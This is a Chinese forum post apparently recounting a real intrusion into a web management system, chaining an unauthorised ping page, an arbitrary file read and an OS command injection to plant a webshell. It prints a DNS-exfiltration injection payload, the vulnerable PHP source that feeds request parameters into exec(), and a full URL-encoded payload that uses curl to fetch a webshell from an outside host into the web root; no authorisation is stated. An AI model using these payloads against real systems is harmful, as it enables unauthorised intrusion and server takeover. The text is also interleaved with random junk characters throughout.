中国网络渗透测试联盟

标题: Web安全之实战通过os命令注入漏洞getwebshell [打印本页]
作者: admin    时间: 2022-3-31 01:39
标题: Web安全之实战通过os命令注入漏洞getwebshell
[md]**一、) b' e! ]: Y; @  f& l
** **寻找突破口**) q  k" e1 u+ v9 O9 S& }
, G) Q9 e0 H/ a4 N
**经过右键查看源代码发现系统的特征为:images/select_bg.png,去钟馗之眼搜索如图:**
! `5 J  F. n4 P/ o9 z
8 o, S! p" y$ Q6 H1 g![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
+ ~" {& ]3 v4 c7 y4 |. Z1 c: `+ C& y; m+ y2 _. J2 j

& v3 X* _2 U) v: q& N' Z+ ~9 @5 |6 h: Q3 u' L2 d# B
**发现reporter和[Technology,6 o3 G- N0 j* g1 i$ Z& P
Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all)都采用这个特征,然后一看之前搞过这样的系统,有源代码,对照源代码目录发现了未授权访问页面。**
" B; }7 g% I7 F* t8 W, T# ?& N" g1 b% T; i
**地址为:**
) G! P$ W1 N9 r9 R' d: E) r4 a1 y: ?
[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**,如图:**
! V; ?# ]: t7 g/ P# R& }1 t! p! X/ n4 ]7 @0 _8 U, f+ a
![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
' W9 ]- L$ L: r' X  U" ~3 K
# @- w  b7 X4 v8 ]( h) L( v
" r$ c; M1 |8 t6 m9 H$ d# I
: I0 F# U4 u/ r' ?0 n) j/ s**测试ping这里的功能,发现可以绕过ping正常功能执行命令,payload为:**" B8 y! S. u7 y. ?& |1 {$ i5 b& j
- u9 I; M' a! P/ Z2 `
**`whoami`.1111.ceye.io** **,如图:**
! x. s7 Y8 n8 I, Y  n, F' o, }3 u0 S
![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
! P& z6 E; C* G9 u( v3 X
0 B0 U6 W- G; _% D; Z) s
9 w; ?& u0 T8 |. R) o; E5 [% C7 m6 q$ f( K0 b3 F6 {% u
**返回dns记录如图:**
& U8 o5 g% H" l8 \: o5 y  ~% h8 x- {
![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
% x# b+ S0 R/ I
; V. ?2 v+ l6 {# k- Y  _- Q  Y9 Y2 A" Q9 f
& F/ z$ j* H9 a( @0 c( r, s
**发现当前用户权限为root**+ n3 _& w. |) w* h: {
# c, F% q  n8 M
**一、1 x& q0 @* x( z9 P1 B
** **通过漏洞组合getwebshell**
- n. U" W6 r# t9 Q# t3 I4 C, V& ~  ?5 f) y# y* G
**    ** **文章就按照挖洞顺序往下写,紧接着执行pwd命令获取web路径,如图:**
9 x/ G) x3 Z9 {, P! Z; I, L% l9 y+ L6 ^! f: ?
![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
2 U1 \' Z) G6 U
2 g/ X. ]+ j- W# |% [0 X
; l& Y  G% |: e) G& F
) B. B, O( v5 B' ~5 U/ W" b$ y**得知网站路径为:/var/www/html/view/systemconfig/systemtool/**
2 t; I5 i* p4 ?+ P% O& s5 v) a. d" T
**正好利用burpsuite发现一处os命令注入漏洞与一处任意文件查看漏洞,如下图为任意文件查看漏洞截图**
: d" ?: O* A( t6 x* h+ G# R8 q( c/ Y, v+ i+ i5 ~6 N
![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
7 e$ \# Q3 |. Y4 l% O/ k+ G2 \" m- R3 X
**Os** **命令注入存的处为:/var/www/html/view/Behavior/toQuery.php,这个路径是通过第一步绕过ping命令正常功能执行命令漏洞获取到的,通过任意文件查看漏洞,我们读取一下源代码**1 z3 n+ a) `: Y8 G7 J

+ W) y& J( s. e0 h![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")\& j. U( M4 Q# n( ~
  R$ B& R7 N/ `1 _
  ^, X4 B8 g8 ?# T9 U3 H
**源代码为:**
* T7 J( v9 M% h5 S+ _& x, Q8 }7 s) x* c
<?php
0 H1 B7 v: @# F1 I+ Finclude_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");2 d9 c; K9 E( z9 g* U* J
?>4 V7 }5 b( R# f. n8 z2 `

4 t1 {7 a$ @, ]4 T# p<?php: B. _* Z6 h" V, ~# T
; b3 k8 G$ f8 J; D, T: F
7 q8 D1 g+ \9 ~! W+ {

% k: Z8 K2 b7 i# ~% S3 s& v! l  Tsession_start ();9 t4 ]/ ]3 H( X% `6 s
" d3 V' R' d- M' _; q
- Y. A. P! o/ R& y
! w5 ?( c: o4 ]; t+ s

( u3 B$ M9 O! ^' T6 s$ ]" }' [1 V$ Z- p9 T

" u) d3 }* c+ ]$ r: F4 k
) y2 P  H9 `' J% fif ($_GET ["objClass"] == "")
" i  L  ^9 {5 s) i1 ?- `: n" W4 U- p! y, e: j  Y8 T

2 o1 }" ^, i+ a) p+ _( }2 f$ h& O
      exit ();, i9 W9 ^0 G& e8 S8 D( W

" z7 s& K0 Y7 _/ o' v1 K8 R
# S* f5 D# m+ a5 n1 n
( Q9 \$ N; Z3 h- a/ e: t6 {' ^$param = $_REQUEST;
, M+ E* ?; Y7 o. }
- o9 D" Z' ?# t2 x; [3 f( g" ^' S0 N' ]' \5 ^. M

: K* d$ u: U5 l' C( \7 q
; W8 o; y9 z5 t8 A) T9 ^
5 q" m" l8 E3 [7 X" C0 k9 D7 n* U, y% y( d
- R! t7 U# B2 g* u
//echo "\n--------------------------\n";3 |! C1 P3 \0 _2 ^2 h, U
6 K: m6 P/ l$ [0 x
8 c, l$ l6 M3 u$ k/ S0 y

" b1 {8 O) t/ {; g, a( ^" `//print_r($param);
$ w0 d+ B! {( q; U9 m& P/ i: f4 ~3 L! s; r6 N% {! v: c
$ n0 k% \4 x5 L6 f, H: h6 w" e' M
; c6 N/ {8 r" W0 j6 V$ A1 Z
//echo "\n--------------------------\n";
- s0 r, H. z6 c8 P5 t; g# H4 ^# ]& g6 u; y& _
8 ^! z% ]+ y2 ?" j1 V9 I, k

5 q: ^+ N) t5 p" Q, F0 b[if ($_GET ["method"] ==
' X' ]$ d) n3 u  `3 ~& G"getList" || $_GET ["method"] == "import" ||% ]3 l! G! u* z5 x, G
$_GET ["method"] == "processAlarm") ](){
5 g) f! W+ s' d8 l/ P8 x1 \
6 Y$ @0 m  A0 U6 h8 C0 R" x/ u/ ]
, }0 J$ n# K1 f9 o& ?( V- t
      $param
* Z8 {/ f8 j# k% X["user"] = $_SESSION ["s_userName"];: v$ Z; N1 U# p' A- y( j
. T2 V' F1 `; u7 w) z+ {3 S8 ~
- x: N4 s1 H. |8 T- S# j3 \
! ~& a+ W6 N, {$ A5 c7 e5 f
      $param
) F" I, _! v0 }+ E$ V["lan"] = $_SESSION ["lan"];3 i, N! L% D9 R3 |' Q
8 g; B7 q* z5 @, w

, O3 T4 v9 K( |% e
( q9 }: Y5 i& @( F7 L" i. B% N      $param+ v- b0 O' |+ e
["regUserpath"] = $_SESSION ["regUserpath"];
6 }  B. X$ F) f  O- R# M; ~: I/ ]* o* G4 M4 G
  V3 G( K/ j4 W8 b
: f! r; P- q- }
   
* B: g7 V1 Z; |9 F* G3 p' _+ l" h+ W$ q
6 t/ d5 t- f2 ^+ |- x# m9 |
5 e% t6 [6 X& J
      exec (
& g4 N: [: D4 y* U3 A/ b. f% h7 g"rm -rf /tmp/cache" );
+ {) f0 W2 u' N
$ D' O' F2 k6 ^7 x# C4 L$ _. o( m5 B
! P. t; d: M5 s* ^  {
      [$cmd = "/usr/local/php/bin/php ".$_SERVER  A& b" M- i  G' E* V! s) z
["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";]()
/ }& c) l& C  ]6 f! q) X, ?" x$ o  u! j1 {0 w3 j+ u
. c0 x2 a0 P! V. T9 v( n; g
8 W+ W6 q7 i" V) z
      $cmd .=
- d% `6 K" x+ l, \" " . $_GET ["objClass"];  ?, k. ~+ h; F3 G4 ^& j  d2 x

6 |- e5 z: y: q7 w
# h5 z: _9 v. f  b
" i1 q' N( O8 [8 F      $cmd .=, l- R; t: e/ C9 \5 ~1 Y
" " . $_GET ["method"];+ s3 S1 S+ x  V+ t

* T6 v, E  B* t4 H% [' }0 r. T
; V2 v0 e5 \" K: K! r. `, C8 Z; [- q) ]- c4 \+ p
      $cmd .=( H3 ^4 J8 M% Y
" " . base64_encode ( json_encode ( $param ) );
. A4 k* q! `; i0 \: O' x2 C: x8 l* m; ^- M) v: T- M) H  d

0 ]$ N/ e  |+ D( Y$ N; M
+ e8 Z4 l8 S% T+ e1 X6 U3 o# i3 f      [file_put_contents("/tmp/query_cmd",$cmd);]()
; n. c- B( u$ }0 g
, B: x: G: ]8 T% k5 A; f; `
& T, m" ?# }4 [8 q( E# s& H$ M
" R% k2 P$ P# t( ~* K+ s9 z      exec ( $cmd . "
, d7 `6 n* N& P) _5 y9 y( ]6 J3 b1 s. q+ K> /dev/null &" );
; y3 y' T7 G8 _- _3 m
( ^% X( `' g+ y; L- A+ \8 j. C) M6 ?2 C! G) T

( {4 p5 M- D* B) e% `# k9 A8 a: s" b+ S# P* `3 r1 C$ I' R' E

8 q2 K, X" V- Y4 W. x* [} else {
  p7 g4 I- {0 H+ \6 H! [9 s. [/ k3 V" U3 {3 m" S9 P) y
2 I  Z* J9 a( u5 Z7 }
( x5 t2 j6 _& d; a+ e7 M
      require_once6 ?9 s* t0 k: V4 z7 M/ u5 j- e
($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");
4 g( e. \' Z# c+ M0 E, b( d$ h# l3 g$ u1 ?& g1 R( z: W: d
: u5 \' f8 @9 W8 W

5 y5 s. v" u) Z7 k& t- P      $obj = new) A+ F/ k0 N$ M" b8 ^  U/ i3 O
QueryInterface ();, }% D+ E, |% [

" g" W+ p- z! `3 d5 Q1 I5 V2 E7 E/ ^3 _1 [# j, f1 E/ j! q' q
9 u7 `( S5 [, u% K1 |( Q2 l
      $instance =
8 B" t1 B1 k# D  w! X$obj->getInstance ();
9 z- ~0 E6 w) L+ D; \8 K6 n. |+ Q* _8 @5 Y5 X

4 Y2 r% `" N0 @1 f5 C% F2 `' }$ R6 `
      $instance->invokeMethod
# l0 j5 ]+ n; O& k' A0 e( $_GET ["objClass"], $_GET ["method"], $param );2 u# U# z1 I  }) h! \, g) U

' m( `( O& u' p" n: }9 a0 {
* f, F* a8 b# q; H, s  P9 i% g  v. C" Y5 P$ s2 \6 U, O0 E: p
}
3 _' U2 a4 K! [7 u! J8 I# B- X: \  X) o4 Z2 t
9 I5 ?2 x8 M- F" J  e( u2 r5 g, j. E, i
; N, O3 X: G7 i0 R1 `9 O6 H
exit ();
- {6 B) q3 W) m* b" g/ q6 W" u6 Z- {+ W, _

+ i# V/ ?" ^9 _: a. G  D4 T* a' O  }5 {) W0 x- L6 x
?>: ~0 V- h% P" @7 L4 q- [% V2 g

! z# S, O; ^- P/ p**经常简单审计发现if ($_GET
' t; _9 ]4 t; N, }, L+ f9 ?["method"] == "getList" || $_GET ["method"] ==
2 X( i5 ?) W- Z"import" || $_GET ["method"] == "[processAlarm]()"),如果method只要等于getList、import、processAlarm这其中一个,$cmd =
- \6 d- m8 o6 l: {% w9 l"/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] .6 q8 d& F# w. K1 g
"[system/behavior/behavior_query.php]()";  cmd等于web绝对路径+ system/behavior/behavior_query.php,然后file_put_contents("/tmp/query_cmd",$cmd);**, W' E. z0 X, [. ?# O. }
, j* `) c2 Y; _9 `% k9 q: F; E
**      exec ( $cmd
+ ^3 {! X( K# l# B& r5 c- e1 K8 K. "  > /dev/null &" );** **给我们构造了一个命令注入的参数,这里直接造成了OS命令注入漏洞,下面看我演示**
. O2 v/ K- v& x0 N" h2 S+ r6 g+ T
8 \/ [. ~: k# f9 ~
. o" p- _) t9 c6 m3 x& [![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")) G# v, J  j4 |, a3 K6 E1 j

7 D1 i/ w, j0 ^7 D& E
% E# g9 U, R" j, }' O% n1 e0 B) @$ t5 j( \
**图中objClass=存在OS命令注入漏洞,我之前试图通过bash反弹shell,但是测试了一晚上没反弹成功,最后选择了curl下载webshell,payload如下:**: s0 X& H4 B5 e) t) i9 E  f/ i

9 G% \1 X6 X; G; E7 Q# Y**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**/ T+ M: [3 }2 n

  A# b- y2 B9 |6 E' \! o: F**我们用url解码如下:**
' X3 L* a% P( \- t6 E( J; B* H2 h" B$ L$ }
**|curl http://1.1.1.1/qYCwxRz1.zip -o
2 A) g; V' C: Y! Y/var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o
8 i) S- i/ }6 T/var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl ** [**http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php**](http://8.136.218.186/qYCwxRz1.zi ... l/images/suiji2.php)3 s5 b! a6 T2 G0 ~6 i8 P+ a9 p
& K/ i0 H, ~& w: Y
**使用这么多管道符|就是要闭合payload,最后成功curl下载webshell如图:**: u5 r- |0 e, g$ o" |: L0 C# D1 O
" L1 ]% K! W( Y6 ]2 U9 s& \) H
1 W, N: E  z  K* }5 m/ h; X% |+ k
![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")5 W: ]9 c* e0 R) R$ S6 `

1 ?+ T% t+ W" h! R' O& ^& h
% d! v7 W- e& i% B2 d
" B$ G/ j* Y$ w! f  R* C2 j" @# ?9 a$ }) l
**三、总结**
8 i( b' I# o* p0 ?; t7 q: E# @9 q' w. i' B, ?4 Y
**   ** **案例之所以最终获得webshell,很大程度上是取决于几个漏洞的组合,首先通过右键查看源代码找到目标系统使用的系统,因为之前测试过与目标类似的程序。然后“对症下药”找到了ping未授权访问页面,通过绕过ping命令正常功能执行pwd命令获取到网站绝对路径,其次,使用任意文件查看漏洞去读取疑似存在os命令执行漏洞的php进行简单审计,经过确认存在此漏洞,最后构造os命令执行payload,最终getwebshell,整个getwebshell过程就是一个漏洞的连环组合,渗透更多的时候是靠运气,如果这几个环节有一个环节漏洞不存在或者没挖到,可能导致getwebshell失败。**
: k: S( i+ Q4 o! s  x' L+ B+ \' }9 R6 l/ |# ~' s9 j- p: P; O) C
**   ** **综上所述,运气与挖洞功底同等重要,谢谢观看** **! **
, r/ P6 @5 I/ F( X[/md]



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2